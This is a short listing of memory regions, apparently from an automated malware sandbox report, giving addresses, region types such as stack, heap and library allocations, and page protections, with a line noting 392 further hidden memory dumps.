220EE000
|
stack
|
page read and write
|
||
48AE000
|
stack
|
page read and write
|
||
734F000
|
stack
|
page read and write
|
||
475000
|
unkown
|
page readonly
|
||
6970000
|
heap
|
page read and write
|
||
21BB0000
|
direct allocation
|
page read and write
|
||
44F000
|
unkown
|
page read and write
|
||
221AE000
|
stack
|
page read and write
|
||
28E0000
|
unkown
|
page readonly
|
||
82CE000
|
stack
|
page read and write
|
||
21BC0000
|
direct allocation
|
page read and write
|
||
8C20000
|
trusted library allocation
|
page execute and read and write
|
||
88C0000
|
heap
|
page read and write
|
||
6F10000
|
direct allocation
|
page read and write
|
||
89F7000
|
trusted library allocation
|
page read and write
|
||
CEE9000
|
trusted library allocation
|
page read and write
|
||
8A11000
|
heap
|
page read and write
|
||
5D6E000
|
trusted library allocation
|
page read and write
|
||
3880000
|
heap
|
page read and write
|
||
8FAD000
|
stack
|
page read and write
|
There are 392 hidden memdumps, click here to show them.